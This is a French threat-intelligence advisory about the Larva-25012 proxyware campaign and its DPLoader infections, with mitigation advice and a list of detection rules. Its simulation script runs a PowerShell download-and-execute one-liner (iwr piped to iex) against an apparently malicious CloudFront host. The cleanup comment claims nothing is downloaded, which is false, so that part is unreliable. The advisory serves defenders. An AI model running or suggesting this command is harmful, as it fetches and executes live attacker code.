SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012 : Une campagne de distribution de proxyware en 2026

Author Photo
SOC Prime Team linkedin icon Suivre
Larva-25012 : Une campagne de distribution de proxyware en 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

L’attaquant Larva-25012 distribue activement des Proxywares pour monétiser les systèmes compromis en détournant la bande passante Internet des utilisateurs. La campagne s’appuie sur des infections DPLoader existantes et utilise plusieurs canaux de distribution, y compris des sites de téléchargement YouTube et GitHub. Le malware déploie plusieurs familles de Proxyware, notamment DigitalPulse, SOAX, Appsalt et IPRoyal.

Enquête

Le Centre d’Intelligence de Sécurité d’AhnLab (ASEC) a suivi l’activité continue de proxyjacking et a identifié les opérations renouvelées de Larva-25012 au cours du second semestre de 2026. L’enquête a révélé que les attaquants utilisent des variantes JavaScript et Python de DPLoader pour maintenir la persistance et exécuter des commandes PowerShell. Des tâches planifiées sont également créées pour garantir que les scripts malveillants continuent de s’exécuter sur les systèmes compromis.

Atténuation

Les utilisateurs doivent éviter de télécharger des fichiers exécutables à partir de sites Web suspects, de publicités pop-up ou de plateformes de partage de fichiers non officielles. Le logiciel doit être obtenu uniquement auprès de sources fiables et légitimes, tandis que les applications crackées et les sites de téléchargement illégaux doivent être évités. Les organisations doivent également veiller à ce que les solutions de protection des points d’extrémité, y compris V3, soient entièrement mises à jour.

Réponse

Lorsqu’une activité suspecte est détectée, les administrateurs doivent identifier et terminer les processus PowerShell malveillants et les tâches planifiées associées aux familles de Proxyware affectées. Les systèmes doivent également être vérifiés pour DPLoader, qui sert de composant clé d’infection et de persistance. Examinez le trafic réseau sortant pour des connexions non autorisées vers l’infrastructure C2 connue ou suspecte.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détection

Téléchargement ou téléchargement via Powershell (via cmdline)

Équipe SOC Prime
22 sep 2026

Processus enfants NodeJS suspects [Windows] (via cmdline)

Équipe SOC Prime
22 sep 2026

Désactiver la surveillance en temps réel de Windows Defender et autres changements de préférences (via cmdline)

Équipe SOC Prime
22 sep 2026

Appel de méthodes .NET suspectes depuis Powershell (via powershell)

Équipe SOC Prime
22 sep 2026

Abus possible de domaine de développement Cloudflare (via dns)

Équipe SOC Prime
22 sep 2026

IOCs (HashMd5) pour détecter : Larva-25012 : Une campagne de distribution de Proxyware 2026

Règles de l’IA SOC Prime
22 sep 2026

Détection de scripts d’installation de Proxyware PowerShell [Windows Powershell]

Règles de l’IA SOC Prime
22 sep 2026

Exécution de simulation

  • Narration d’attaque & Commandes : Un adversaire, tentant d’installer proxyware pour un usage non autorisé de la bande passante (Larva-25012), exécute une commande en une ligne PowerShell. L’objectif est de contourner la vérification des fichiers locaux en téléchargeant directement la charge utile en mémoire. Ils utilisent le -ExecutionPolicy Bypass drapeau pour s’assurer que le script s’exécute et iwr pour récupérer le fichier depuis une distribution Cloudfront, en le transmettant à iex pour une exécution immédiate. Cette ligne de commande spécifique est l’une des signatures ciblées dans la règle de détection.

  • Script de test de régression :

    # Simulation de l'installation de Proxyware Larva-25012
    # Cette commande est spécifiquement conçue pour correspondre à la sélection2 dans la règle de détection.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Nous utilisons Start-Process pour nous assurer que la ligne de commande est capturée comme un nouvel événement de processus
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Commandes de nettoyage :

    # Aucun fichier n'est réellement téléchargé en raison de la nature du pipe 'iex' en simulation, 
    # mais si des artefacts ont été créés, ils seraient supprimés ici.
    Write-Host "Nettoyage de simulation terminé. Aucun artefact persistant créé."